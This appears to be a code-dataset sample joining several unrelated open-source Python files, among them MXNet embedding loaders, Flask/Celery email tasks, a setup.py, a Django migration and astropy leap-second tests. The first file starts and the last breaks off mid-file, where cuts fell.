https://fedoraproject.org/wiki/Licensing/PDDL
Parameters
----------
pretrained_file_name : str, default 'glove.840B.300d.txt'
The name of the pre-trained token embedding file.
embedding_root : str, default $MXNET_HOME/embeddings
The root directory for storing embedding-related files.
init_unknown_vec : callback
The callback used to initialize the embedding vector for the unknown token.
vocabulary : :class:`~mxnet.contrib.text.vocab.Vocabulary`, default None
It contains the tokens to index. Each indexed token will be associated with the loaded
embedding vectors, such as loaded from a pre-trained token embedding file. If None, all the
tokens from the loaded embedding vectors, such as loaded from a pre-trained token embedding
file, will be indexed.
"""
# Map a pre-trained token embedding archive file and its SHA-1 hash.
pretrained_archive_name_sha1 = C.GLOVE_PRETRAINED_FILE_SHA1
# Map a pre-trained token embedding file and its SHA-1 hash.
pretrained_file_name_sha1 = C.GLOVE_PRETRAINED_ARCHIVE_SHA1
@classmethod
def _get_download_file_name(cls, pretrained_file_name):
# Map a pre-trained embedding file to its archive to download.
src_archive = {archive.split('.')[1]: archive for archive in
GloVe.pretrained_archive_name_sha1.keys()}
archive = src_archive[pretrained_file_name.split('.')[1]]
return archive
def __init__(self, pretrained_file_name='glove.840B.300d.txt',
embedding_root=os.path.join(base.data_dir(), 'embeddings'),
init_unknown_vec=nd.zeros, vocabulary=None, **kwargs):
GloVe._check_pretrained_file_names(pretrained_file_name)
super(GloVe, self).__init__(**kwargs)
pretrained_file_path = GloVe._get_pretrained_file(embedding_root, pretrained_file_name)
self._load_embedding(pretrained_file_path, ' ', init_unknown_vec)
if vocabulary is not None:
self._build_embedding_for_vocabulary(vocabulary)
@register
class FastText(_TokenEmbedding):
"""The fastText word embedding.
FastText is an open-source, free, lightweight library that allows users to learn text
representations and text classifiers. It works on standard, generic hardware. Models can later
be reduced in size to even fit on mobile devices. (Source from https://fasttext.cc/)
References
----------
Enriching Word Vectors with Subword Information.
Piotr Bojanowski, Edouard Grave, Armand Joulin, and Tomas Mikolov.
https://arxiv.org/abs/1607.04606
Bag of Tricks for Efficient Text Classification.
Armand Joulin, Edouard Grave, Piotr Bojanowski, and Tomas Mikolov.
https://arxiv.org/abs/1607.01759
FastText.zip: Compressing text classification models.
Armand Joulin, Edouard Grave, Piotr Bojanowski, Matthijs Douze, Herve Jegou,
and Tomas Mikolov.
https://arxiv.org/abs/1612.03651
For 'wiki.multi' embeddings:
Word Translation Without Parallel Data
Alexis Conneau, Guillaume Lample, Marc'Aurelio Ranzato, Ludovic Denoyer,
and Herve Jegou.
https://arxiv.org/abs/1710.04087
Website:
https://fasttext.cc/
To get the updated URLs to the externally hosted pre-trained token embedding files, visit
https://github.com/facebookresearch/fastText/blob/master/pretrained-vectors.md
License for pre-trained embeddings:
https://creativecommons.org/licenses/by-sa/3.0/
Parameters
----------
pretrained_file_name : str, default 'wiki.en.vec'
The name of the pre-trained token embedding file.
embedding_root : str, default $MXNET_HOME/embeddings
The root directory for storing embedding-related files.
init_unknown_vec : callback
The callback used to initialize the embedding vector for the unknown token.
vocabulary : :class:`~mxnet.contrib.text.vocab.Vocabulary`, default None
It contains the tokens to index. Each indexed token will be associated with the loaded
embedding vectors, such as loaded from a pre-trained token embedding file. If None, all the
tokens from the loaded embedding vectors, such as loaded from a pre-trained token embedding
file, will be indexed.
"""
# Map a pre-trained token embedding archive file and its SHA-1 hash.
pretrained_archive_name_sha1 = C.FAST_TEXT_ARCHIVE_SHA1
# Map a pre-trained token embedding file and its SHA-1 hash.
pretrained_file_name_sha1 = C.FAST_TEXT_FILE_SHA1
@classmethod
def _get_download_file_name(cls, pretrained_file_name):
# Map a pre-trained embedding file to its archive to download.
return '.'.join(pretrained_file_name.split('.')[:-1])+'.zip'
def __init__(self, pretrained_file_name='wiki.simple.vec',
embedding_root=os.path.join(base.data_dir(), 'embeddings'),
init_unknown_vec=nd.zeros, vocabulary=None, **kwargs):
FastText._check_pretrained_file_names(pretrained_file_name)
super(FastText, self).__init__(**kwargs)
pretrained_file_path = FastText._get_pretrained_file(embedding_root, pretrained_file_name)
self._load_embedding(pretrained_file_path, ' ', init_unknown_vec)
if vocabulary is not None:
self._build_embedding_for_vocabulary(vocabulary)
class CustomEmbedding(_TokenEmbedding):
"""User-defined token embedding.
This is to load embedding vectors from a user-defined pre-trained text embedding file.
Denote by '[ed]' the argument `elem_delim`. Denote by [v_ij] the j-th element of the token
embedding vector for [token_i], the expected format of a custom pre-trained token embedding file
is:
'[token_1][ed][v_11][ed][v_12][ed]...[ed][v_1k]\\\\n[token_2][ed][v_21][ed][v_22][ed]...[ed]
[v_2k]\\\\n...'
where k is the length of the embedding vector `vec_len`.
Parameters
----------
pretrained_file_path : str
The path to the custom pre-trained token embedding file.
elem_delim : str, default ' '
The delimiter for splitting a token and every embedding vector element value on the same
line of the custom pre-trained token embedding file.
encoding : str, default 'utf8'
The encoding scheme for reading the custom pre-trained token embedding file.
init_unknown_vec : callback
The callback used to initialize the embedding vector for the unknown token.
vocabulary : :class:`~mxnet.contrib.text.vocab.Vocabulary`, default None
It contains the tokens to index. Each indexed token will be associated with the loaded
embedding vectors, such as loaded from a pre-trained token embedding file. If None, all the
tokens from the loaded embedding vectors, such as loaded from a pre-trained token embedding
file, will be indexed.
"""
def __init__(self, pretrained_file_path, elem_delim=' ', encoding='utf8',
init_unknown_vec=nd.zeros, vocabulary=None, **kwargs):
super(CustomEmbedding, self).__init__(**kwargs)
self._load_embedding(pretrained_file_path, elem_delim, init_unknown_vec, encoding)
if vocabulary is not None:
self._build_embedding_for_vocabulary(vocabulary)
class CompositeEmbedding(_TokenEmbedding):
"""Composite token embeddings.
For each indexed token in a vocabulary, multiple embedding vectors, such as concatenated
multiple embedding vectors, will be associated with it. Such embedding vectors can be loaded
from externally hosted or custom pre-trained token embedding files, such as via token embedding
instances.
Parameters
----------
vocabulary : :class:`~mxnet.contrib.text.vocab.Vocabulary`
For each indexed token in a vocabulary, multiple embedding vectors, such as concatenated
multiple embedding vectors, will be associated with it.
token_embeddings : instance or list of `mxnet.contrib.text.embedding._TokenEmbedding`
One or multiple pre-trained token embeddings to load. If it is a list of multiple
embeddings, these embedding vectors will be concatenated for each token.
"""
def __init__(self, vocabulary, token_embeddings):
# Sanity checks.
assert isinstance(vocabulary, vocab.Vocabulary), \
'The argument `vocabulary` must be an instance of ' \
'mxnet.contrib.text.indexer.Vocabulary.'
if not isinstance(token_embeddings, list):
token_embeddings = [token_embeddings]
for embed in token_embeddings:
assert isinstance(embed, _TokenEmbedding), \
'The argument `token_embeddings` must be an instance or a list of instances ' \
'of `mxnet.contrib.text.embedding.TextEmbedding` whose embedding vectors will be' \
'loaded or concatenated-then-loaded to map to the indexed tokens.'
# Index tokens.
self._index_tokens_from_vocabulary(vocabulary)
# Set _idx_to_vec so that indices of tokens from keys of `counter` are associated with token
# embedding vectors from `token_embeddings`.
self._set_idx_to_vec_by_embeddings(token_embeddings, len(self), self.idx_to_token)
| tlby/mxnet | python/mxnet/contrib/text/embedding.py | Python | apache-2.0 | 30,929 |
from consts.client_type import ClientType
from consts.notification_type import NotificationType
from controllers.gcm.gcm import GCMMessage
from notifications.base_notification import BaseNotification
class UpdateFavoritesNotification(BaseNotification):
_supported_clients = [ClientType.OS_ANDROID, ClientType.WEBHOOK]
_track_call = False
def __init__(self, user_id, sending_device_key):
self.user_id = user_id
self.sending_device_key = sending_device_key
@property
def _type(self):
return NotificationType.UPDATE_FAVORITES
def _build_dict(self):
data = {}
data['message_type'] = NotificationType.type_names[self._type]
return data
def _render_android(self):
user_collapse_key = "{}_favorite_update".format(self.user_id)
if self.sending_device_key in self.keys[ClientType.OS_ANDROID]:
self.keys[ClientType.OS_ANDROID].remove(self.sending_device_key)
data = self._build_dict()
return GCMMessage(self.keys[ClientType.OS_ANDROID], data, collapse_key=user_collapse_key)
| nwalters512/the-blue-alliance | notifications/update_favorites.py | Python | mit | 1,094 |
from datetime import datetime
from dateutil.relativedelta import relativedelta
from flask import Flask
from celery import Celery
from .mail_utility import send_email
def make_celery(app):
celery = Celery(app.import_name,
backend=app.config['CELERY_BACKEND'],
broker=app.config['CELERY_BROKER_URL'])
celery.conf.update(app.config)
TaskBase = celery.Task
class ContextTask(TaskBase):
abstract = True
def __call__(self, *args, **kwargs):
with app.app_context():
return TaskBase.__call__(self, *args, **kwargs)
celery.Task = ContextTask
return celery
flask_app = Flask(__name__)
flask_app.config.from_object('config')
celery = make_celery(flask_app)
DEBUG = flask_app.config.get('DEBUG')
@celery.task()
def send_email_task(email_recipients, message, subject):
send_email(email_recipients, message, subject)
@celery.task()
def send_email_periodic_task(email_recipients, message, subject, period_data, last_date):
send_email(email_recipients, message, subject)
next_date = calculate_next_date(period_data, datetime.strptime(last_date, '%Y-%m-%dT%H:%M:%S'))
try:
send_email_periodic_task.apply_async(args=[email_recipients, message, subject, period_data, next_date],
eta=next_date)
except:
if DEBUG:
raise
def setup_periodic_email_task(email_recipients, message, subject, period_data, date_start):
# The task is added, but scheduler isn't reloaded.
# Tried to use beat_max_loop_interval setting as well
# celery.add_periodic_task(10.0,
# app.tasks.send_email_task.s(email_recipients, message, subject),
# name='add every 10')
# Calculate next date
next_date = calculate_next_date(period_data, date_start)
try:
send_email_periodic_task.apply_async(args=[email_recipients, message, subject, period_data, next_date],
eta=next_date)
except:
if DEBUG:
raise
def calculate_next_date(data, date_start):
if data.get('period_days'):
days = data.get('period_days')
next_date = date_start + relativedelta(days=+days)
elif data.get('period_months'):
months = data.get('period_months')
next_date = date_start + relativedelta(months=+months)
elif data.get('period_years'):
years = data.get('period_years')
next_date = date_start + relativedelta(years=+years)
return next_date
def apply_send_email_task(email_recipients, email_message, subject, kwargs):
try:
send_email_task.apply_async(args=[email_recipients, email_message, subject], **kwargs)
except:
if DEBUG:
raise
| vsilent/Vision | app/tasks.py | Python | gpl-2.0 | 2,777 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import re
from codecs import open
version = ""
with open("koordinates/__init__.py", "r") as fd:
version = re.search(
r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', fd.read(), re.MULTILINE
).group(1)
with open("README.md", "r", "utf-8") as f:
readme = f.read()
setup(
name="koordinates",
packages=[
"koordinates",
],
version=version,
description="A Python client library for a number of Koordinates web APIs",
long_description=readme,
long_description_content_type="text/markdown",
author="Koordinates Limited",
author_email="support@koordinates.com",
url="https://github.com/koordinates/python-client",
keywords="koordinates api",
license="BSD",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Scientific/Engineering :: GIS",
],
python_requires=">=3.5",
install_requires=[
"python-dateutil>=2,<3",
"pytz",
"requests>=2.5,<3",
"requests-toolbelt>=0.4,<1",
],
tests_require=[
"pytest>=3.3",
"responses>=0.3",
"coverage>=3.7,<4",
],
zip_safe=False,
)
| koordinates/python-client | setup.py | Python | bsd-3-clause | 1,747 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('cali_water', '0018_auto_20150501_1126'),
]
operations = [
migrations.AlterField(
model_name='watersuppliermonthlyreport',
name='hydrologic_region',
field=models.CharField(db_index=True, max_length=255, null=True, verbose_name=b'Hydrologic Region', blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='watersuppliermonthlyreport',
name='supplier_slug',
field=models.SlugField(max_length=255, null=True, verbose_name=b'Water Supplier Slug', blank=True),
preserve_default=True,
),
]
| SCPR/accountability-tracker | cali_water/migrations/0019_auto_20150501_1150.py | Python | gpl-2.0 | 821 |
from .vnsipmd import MdApi
from .sip_constant import * | bigdig/vnpy | vnpy/api/sip/__init__.py | Python | mit | 54 |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import urllib.request
import os
import locale
import platform
import pytest
import numpy as np
from numpy.testing import assert_array_equal
import erfa
from astropy.time import Time, TimeDelta
from astropy.utils.iers import iers
from astropy.utils.data import get_pkg_data_filename
SYSTEM_FILE = '/usr/share/zoneinfo/leap-seconds.list'
# Test leap_seconds.list in test/data.
LEAP_SECOND_LIST = get_pkg_data_filename('data/leap-seconds.list')
def test_configuration():
# This test just ensures things stay consistent.
# Adjust if changes are made.
assert iers.conf.iers_leap_second_auto_url == iers.IERS_LEAP_SECOND_URL
assert iers.conf.ietf_leap_second_auto_url == iers.IETF_LEAP_SECOND_URL
class TestReading:
"""Basic tests that leap seconds can be read."""
def verify_day_month_year(self, ls):
assert np.all(ls['day'] == 1)
assert np.all((ls['month'] == 1) | (ls['month'] == 7) |
(ls['year'] < 1970))
assert np.all(ls['year'] >= 1960)
t = Time({'year': ls['year'], 'month': ls['month'], 'day': ls['day']},
format='ymdhms')
assert np.all(t == Time(ls['mjd'], format='mjd'))
def test_read_leap_second_dat(self):
ls = iers.LeapSeconds.from_iers_leap_seconds(
iers.IERS_LEAP_SECOND_FILE)
# Below, >= to take into account we might ship and updated file.
assert ls.expires >= Time('2020-06-28', scale='tai')
assert ls['mjd'][0] == 41317
assert ls['tai_utc'][0] == 10
assert ls['mjd'][-1] >= 57754
assert ls['tai_utc'][-1] >= 37
self.verify_day_month_year(ls)
def test_read_leap_second_dat_locale(self):
current = locale.setlocale(locale.LC_ALL)
try:
if platform.system() == 'Darwin':
locale.setlocale(locale.LC_ALL, 'fr_FR')
else:
locale.setlocale(locale.LC_ALL, 'fr_FR.utf8')
ls = iers.LeapSeconds.from_iers_leap_seconds(
iers.IERS_LEAP_SECOND_FILE)
except locale.Error as e:
pytest.skip(f'Locale error: {e}')
finally:
locale.setlocale(locale.LC_ALL, current)
# Below, >= to take into account we might ship and updated file.
assert ls.expires >= Time('2020-06-28', scale='tai')
def test_open_leap_second_dat(self):
ls = iers.LeapSeconds.from_iers_leap_seconds(
iers.IERS_LEAP_SECOND_FILE)
ls2 = iers.LeapSeconds.open(iers.IERS_LEAP_SECOND_FILE)
assert np.all(ls == ls2)
@pytest.mark.parametrize('file', (
LEAP_SECOND_LIST,
"file:" + urllib.request.pathname2url(LEAP_SECOND_LIST)))
def test_read_leap_seconds_list(self, file):
ls = iers.LeapSeconds.from_leap_seconds_list(file)
assert ls.expires == Time('2020-06-28', scale='tai')
assert ls['mjd'][0] == 41317
assert ls['tai_utc'][0] == 10
assert ls['mjd'][-1] == 57754
assert ls['tai_utc'][-1] == 37
self.verify_day_month_year(ls)
@pytest.mark.parametrize('file', (
LEAP_SECOND_LIST,
"file:" + urllib.request.pathname2url(LEAP_SECOND_LIST)))
def test_open_leap_seconds_list(self, file):
ls = iers.LeapSeconds.from_leap_seconds_list(file)
ls2 = iers.LeapSeconds.open(file)
assert np.all(ls == ls2)
@pytest.mark.skipif(not os.path.isfile(SYSTEM_FILE),
reason=f'system does not have {SYSTEM_FILE}')
def test_open_system_file(self):
ls = iers.LeapSeconds.open(SYSTEM_FILE)
expired = ls.expires < Time.now()
if expired:
pytest.skip("System leap second file is expired.")
assert not expired
def make_fake_file(expiration, tmpdir):
"""copy the built-in IERS file but set a different expiration date."""
ls = iers.LeapSeconds.from_iers_leap_seconds()
fake_file = str(tmpdir.join('fake_leap_seconds.dat'))
with open(fake_file, 'w') as fh:
fh.write('\n'.join([f'# File expires on {expiration}']
+ str(ls).split('\n')[2:-1]))
return fake_file
def test_fake_file(tmpdir):
fake_file = make_fake_file('28 June 2345', tmpdir)
fake = iers.LeapSeconds.from_iers_leap_seconds(fake_file)
assert fake.expires == Time('2345-06-28', scale='tai')
# For this set of tests, leap-seconds are allowed to be expired
# except as explicitly tested.
@pytest.mark.filterwarnings(iers.IERSStaleWarning)
class TestAutoOpenExplicitLists:
def test_auto_open_simple(self):
ls = iers.LeapSeconds.auto_open([iers.IERS_LEAP_SECOND_FILE])
assert ls.meta['data_url'] == iers.IERS_LEAP_SECOND_FILE
def test_auto_open_erfa(self):
ls = iers.LeapSeconds.auto_open(['erfa', iers.IERS_LEAP_SECOND_FILE])
assert ls.meta['data_url'] in ['erfa', iers.IERS_LEAP_SECOND_FILE]
def test_fake_future_file(self, tmpdir):
fake_file = make_fake_file('28 June 2345', tmpdir)
# Try as system file for auto_open, setting auto_max_age such
# that any ERFA or system files are guaranteed to be expired,
# while the fake file is guaranteed to be OK.
with iers.conf.set_temp('auto_max_age', -100000):
ls = iers.LeapSeconds.auto_open([
'erfa', iers.IERS_LEAP_SECOND_FILE, fake_file])
assert ls.expires == Time('2345-06-28', scale='tai')
assert ls.meta['data_url'] == str(fake_file)
# And as URL
fake_url = "file:" + urllib.request.pathname2url(fake_file)
ls2 = iers.LeapSeconds.auto_open([
'erfa', iers.IERS_LEAP_SECOND_FILE, fake_url])
assert ls2.expires == Time('2345-06-28', scale='tai')
assert ls2.meta['data_url'] == str(fake_url)
def test_fake_expired_file(self, tmpdir):
fake_file1 = make_fake_file('28 June 2010', tmpdir)
fake_file2 = make_fake_file('27 June 2012', tmpdir)
# Between these and the built-in one, the built-in file is best.
ls = iers.LeapSeconds.auto_open([fake_file1, fake_file2,
iers.IERS_LEAP_SECOND_FILE])
assert ls.meta['data_url'] == iers.IERS_LEAP_SECOND_FILE
# But if we remove the built-in one, the least expired one will be
# used and we get a warning that it is stale.
with pytest.warns(iers.IERSStaleWarning):
ls2 = iers.LeapSeconds.auto_open([fake_file1, fake_file2])
assert ls2.meta['data_url'] == fake_file2
assert ls2.expires == Time('2012-06-27', scale='tai')
# Use the fake files to make sure auto_max_age is safe.
with iers.conf.set_temp('auto_max_age', None):
ls3 = iers.LeapSeconds.auto_open([fake_file1,
iers.IERS_LEAP_SECOND_FILE])
assert ls3.meta['data_url'] == fake_file1
@pytest.mark.remote_data
class TestRemoteURLs:
def setup_class(cls):
# Need auto_download so that IERS_B won't be loaded and cause tests to
# fail.
iers.conf.auto_download = True
def teardown_class(cls):
# This setting is to be consistent with astropy/conftest.py
iers.conf.auto_download = False
# In these tests, the results may be cached.
# This is fine - no need to download again.
def test_iers_url(self):
ls = iers.LeapSeconds.auto_open([iers.IERS_LEAP_SECOND_URL])
assert ls.expires > Time.now()
def test_ietf_url(self):
ls = iers.LeapSeconds.auto_open([iers.IETF_LEAP_SECOND_URL])
assert ls.expires > Time.now()
class TestDefaultAutoOpen:
"""Test auto_open with different _auto_open_files."""
def setup(self):
# Identical to what is used in LeapSeconds.auto_open().
self.good_enough = (iers.LeapSeconds._today()
+ TimeDelta(180 - iers._none_to_float(iers.conf.auto_max_age),
format='jd'))
self._auto_open_files = iers.LeapSeconds._auto_open_files.copy()
def teardown(self):
iers.LeapSeconds._auto_open_files = self._auto_open_files
def remove_auto_open_files(self, *files):
"""Remove some files from the auto-opener.
The default set is restored in teardown.
"""
for f in files:
iers.LeapSeconds._auto_open_files.remove(f)
def test_erfa_found(self):
# Set huge maximum age such that whatever ERFA has is OK.
# Since it is checked first, it should thus be found.
with iers.conf.set_temp('auto_max_age', 100000):
ls = iers.LeapSeconds.open()
assert ls.meta['data_url'] == 'erfa'
def test_builtin_found(self):
# Set huge maximum age such that built-in file is always OK.
# If we remove 'erfa', it should thus be found.
self.remove_auto_open_files('erfa')
with iers.conf.set_temp('auto_max_age', 100000):
ls = iers.LeapSeconds.open()
assert ls.meta['data_url'] == iers.IERS_LEAP_SECOND_FILE
# The test below is marked remote_data only to ensure it runs
# as an allowed-fail job on CI: i.e., we will notice it (eventually)
# but will not be misled in thinking that a PR is bad.
@pytest.mark.remote_data
def test_builtin_not_expired(self):
# TODO: would be nice to have automatic PRs for this!
ls = iers.LeapSeconds.open(iers.IERS_LEAP_SECOND_FILE)
assert ls.expires > self.good_enough, (
"The leap second file built in to astropy is expired. Fix with:\n"
"cd astropy/utils/iers/data/; . update_builtin_iers.sh\n"
"and commit as a PR (for details, see release procedure).")
def test_fake_future_file(self, tmpdir):
fake_file = make_fake_file('28 June 2345', tmpdir)
# Try as system file for auto_open, setting auto_max_age such
# that any ERFA or system files are guaranteed to be expired.
with iers.conf.set_temp('auto_max_age', -100000), \
iers.conf.set_temp('system_leap_second_file', fake_file):
ls = iers.LeapSeconds.open()
assert ls.expires == Time('2345-06-28', scale='tai')
assert ls.meta['data_url'] == str(fake_file)
# And as URL
fake_url = "file:" + urllib.request.pathname2url(fake_file)
with iers.conf.set_temp('auto_max_age', -100000), \
iers.conf.set_temp('iers_leap_second_auto_url', fake_url):
ls2 = iers.LeapSeconds.open()
assert ls2.expires == Time('2345-06-28', scale='tai')
assert ls2.meta['data_url'] == str(fake_url)
def test_fake_expired_file(self, tmpdir):
self.remove_auto_open_files('erfa', 'iers_leap_second_auto_url',
'ietf_leap_second_auto_url')
fake_file = make_fake_file('28 June 2010', tmpdir)
with iers.conf.set_temp('system_leap_second_file', fake_file):
# If we try this directly, the built-in file will be found.
ls = iers.LeapSeconds.open()
assert ls.meta['data_url'] == iers.IERS_LEAP_SECOND_FILE
# But if we remove the built-in one, the expired one will be
# used and we get a warning that it is stale.
self.remove_auto_open_files(iers.IERS_LEAP_SECOND_FILE)
with pytest.warns(iers.IERSStaleWarning):
ls2 = iers.LeapSeconds.open()
assert ls2.meta['data_url'] == fake_file
assert ls2.expires == Time('2010-06-28', scale='tai')
@pytest.mark.skipif(not os.path.isfile(SYSTEM_FILE),
reason=f'system does not have {SYSTEM_FILE}')
def test_system_file_used_if_not_expired(self, tmpdir):
# We skip the test if the system file is on a CI and is expired -
# we should not depend on CI keeping it up to date, but if it is,
# we should check that it is used if possible.
if (iers.LeapSeconds.open(SYSTEM_FILE).expires <= self.good_enough):
pytest.skip("System leap second file is expired.")
self.remove_auto_open_files('erfa')
with iers.conf.set_temp('system_leap_second_file', SYSTEM_FILE):
ls = iers.LeapSeconds.open()
assert ls.expires > self.good_enough
assert ls.meta['data_url'] in (iers.IERS_LEAP_SECOND_FILE,
SYSTEM_FILE)
# Also check with a "built-in" file that is expired
fake_file = make_fake_file('28 June 2017', tmpdir)
iers.LeapSeconds._auto_open_files[0] = fake_file
ls2 = iers.LeapSeconds.open()
assert ls2.expires > Time.now()
assert ls2.meta['data_url'] == SYSTEM_FILE
@pytest.mark.remote_data
def test_auto_open_urls_always_good_enough(self):
# Avoid using the erfa, built-in and system files, as they might
# be good enough already.
try:
# Need auto_download so that IERS_B won't be loaded and
# cause tests to fail.
iers.conf.auto_download = True
self.remove_auto_open_files('erfa', iers.IERS_LEAP_SECOND_FILE,
'system_leap_second_file')
ls = iers.LeapSeconds.open()
assert ls.expires > self.good_enough
assert ls.meta['data_url'].startswith('http')
finally:
# This setting is to be consistent with astropy/conftest.py
iers.conf.auto_download = False
class ERFALeapSecondsSafe:
"""Base class for tests that change the ERFA leap-second tables.
It ensures the original state is restored.
"""
def setup(self):
# Keep current leap-second table and expiration.
self.erfa_ls = self._erfa_ls = erfa.leap_seconds.get()
self.erfa_expires = self._expires = erfa.leap_seconds._expires
def teardown(self):
# Restore leap-second table and expiration.
erfa.leap_seconds.set(self.erfa_ls)
erfa.leap_seconds._expires = self._expires
class TestFromERFA(ERFALeapSecondsSafe):
def test_get_erfa_ls(self):
ls = iers.LeapSeconds.from_erfa()
assert ls.colnames == ['year', 'month', 'tai_utc']
assert isinstance(ls.expires, Time)
assert ls.expires == self.erfa_expires
ls_array = np.array(ls['year', 'month', 'tai_utc'])
assert np.all(ls_array == self.erfa_ls)
def test_get_built_in_erfa_ls(self):
ls = iers.LeapSeconds.from_erfa(built_in=True)
assert ls.colnames == ['year', 'month', 'tai_utc']
assert isinstance(ls.expires, Time)
ls_array = np.array(ls['year', 'month', 'tai_utc'])
assert np.all(ls_array == self.erfa_ls[:len(ls_array)])
def test_get_modified_erfa_ls(self):
erfa.leap_seconds.set(self.erfa_ls[:-10])
ls = iers.LeapSeconds.from_erfa()
assert len(ls) == len(self.erfa_ls)-10
ls_array = np.array(ls['year', 'month', 'tai_utc'])
assert np.all(ls_array == self.erfa_ls[:-10])
ls2 = iers.LeapSeconds.from_erfa(built_in=True)
assert len(ls2) > len(ls)
erfa.leap_seconds.set(None)
erfa_built_in = erfa.leap_seconds.get()
assert len(ls2) == len(erfa_built_in)
ls2_array = np.array(ls2['year', 'month', 'tai_utc'])
assert np.all(ls2_array == erfa_built_in)
def test_open(self):
ls = iers.LeapSeconds.open('erfa')
assert isinstance(ls.expires, Time)
assert ls.expires == self.erfa_expires
ls_array = np.array(ls['year', 'month', 'tai_utc'])
assert np.all(ls_array == self.erfa_ls)
class TestUpdateLeapSeconds(ERFALeapSecondsSafe):
def setup(self):
super().setup()
# Read default leap second table.
self.ls = iers.LeapSeconds.from_iers_leap_seconds()
# For tests, reset ERFA table to built-in default.
erfa.leap_seconds.set()
self.erfa_ls = erfa.leap_seconds.get()
def test_built_in_up_to_date(self):
"""Leap second should match between built-in and ERFA."""
erfa_since_1970 = self.erfa_ls[self.erfa_ls['year'] > 1970]
assert len(self.ls) >= len(erfa_since_1970), \
"built-in leap seconds out of date"
assert len(self.ls) <= len(erfa_since_1970), \
"ERFA leap seconds out of date"
overlap = np.array(self.ls['year', 'month', 'tai_utc'])
assert np.all(overlap == erfa_since_1970.astype(overlap.dtype))
def test_update_with_built_in(self):
"""An update with built-in should not do anything."""
n_update = self.ls.update_erfa_leap_seconds()
assert n_update == 0
new_erfa_ls = erfa.leap_seconds.get()
assert np.all(new_erfa_ls == self.erfa_ls)
@pytest.mark.parametrize('n_short', (1, 3))
def test_update(self, n_short):
"""Check whether we can recover removed leap seconds."""
erfa.leap_seconds.set(self.erfa_ls[:-n_short])
n_update = self.ls.update_erfa_leap_seconds()
assert n_update == n_short
new_erfa_ls = erfa.leap_seconds.get()
assert_array_equal(new_erfa_ls, self.erfa_ls)
# Check that a second update does not do anything.
n_update2 = self.ls.update_erfa_leap_seconds()
assert n_update2 == 0
new_erfa_ls2 = erfa.leap_seconds.get()
assert_array_equal(new_erfa_ls2, self.erfa_ls)
def test_update_initialize_erfa(self):
# With pre-initialization, update does nothing.
erfa.leap_seconds.set(self.erfa_ls[:-2])
n_update = self.ls.update_erfa_leap_seconds(initialize_erfa=True)
assert n_update == 0
new_erfa_ls = erfa.leap_seconds.get()
assert_array_equal(new_erfa_ls, self.erfa_ls)
def test_update_overwrite(self):
n_update = self.ls.update_erfa_leap_seconds(initialize_erfa='empty')
assert n_update == len(self.ls)
new_erfa_ls = erfa.leap_seconds.get()
assert new_erfa_ls['year'].min() > 1970
n_update2 = self.ls.update_erfa_leap_seconds()
assert n_update2 == 0
new_erfa_ls2 = erfa.leap_seconds.get()
assert_array_equal(new_erfa_ls2, new_erfa_ls)
n_update3 = self.ls.update_erfa_leap_seconds(initialize_erfa=True)
assert n_update3 == 0
new_erfa_ls3 = erfa.leap_seconds.get()
assert_array_equal(new_erfa_ls3, self.erfa_ls)
def test_bad_jump(self):
erfa.leap_seconds.set(self.erfa_ls[:-2])
bad = self.ls.copy()
bad['tai_utc'][-1] = 5
with pytest.raises(ValueError, match='jump'):
bad.update_erfa_leap_seconds()
# With an error the ERFA table should not change.
assert_array_equal(erfa.leap_seconds.get(), self.erfa_ls[:-2])
# Unless we initialized it beforehand.
with pytest.raises(ValueError, match='jump'):
bad.update_erfa_leap_seconds(initialize_erfa=True)
assert_array_equal(erfa.leap_seconds.get(), self.erfa_ls)
# Of course, we get no errors if we initialize only.
erfa.leap_seconds.set(self.erfa_ls[:-2])
n_update = bad.update_erfa_leap_seconds(initialize_erfa='only')
assert n_update == 0
new_erfa_ls = erfa.leap_seconds.get()
assert_array_equal(new_erfa_ls, self.erfa_ls)
def test_bad_day(self):
erfa.leap_seconds.set(self.erfa_ls[:-2])
bad = self.ls.copy()
bad['day'][-1] = 5
with pytest.raises(ValueError, match='not on 1st'):
bad.update_erfa_leap_seconds()
def test_bad_month(self):
erfa.leap_seconds.set(self.erfa_ls[:-2])
bad = self.ls.copy()
bad['month'][-1] = 5
with pytest.raises(ValueError, match='January'):
bad.update_erfa_leap_seconds()
assert_array_equal(erfa.leap_seconds.get(), self.erfa_ls[:-2])
| dhomeier/astropy | astropy/utils/iers/tests/test_leap_second.py | Python | bsd-3-clause | 19,966 |
# This file is part of MSMTools.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# MSMTools is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import numpy as np
from msmtools.util.birth_death_chain import BirthDeathChain
from tests.numeric import assert_allclose
from msmtools.analysis.dense.stationary_vector import stationary_distribution_from_eigenvector
from msmtools.analysis.dense.stationary_vector import stationary_distribution_from_backward_iteration
class TestStationaryVector(unittest.TestCase):
def setUp(self):
self.dim = 100
self.k = 10
"""Set up meta-stable birth-death chain"""
p = np.zeros(self.dim)
p[0:-1] = 0.5
q = np.zeros(self.dim)
q[1:] = 0.5
p[self.dim // 2 - 1] = 0.001
q[self.dim // 2 + 1] = 0.001
self.bdc = BirthDeathChain(q, p)
def test_statdist_decomposition(self):
P = self.bdc.transition_matrix()
mu = self.bdc.stationary_distribution()
mun = stationary_distribution_from_eigenvector(P)
assert_allclose(mu, mun)
def test_statdist_iteration(self):
P = self.bdc.transition_matrix()
mu = self.bdc.stationary_distribution()
mun = stationary_distribution_from_backward_iteration(P)
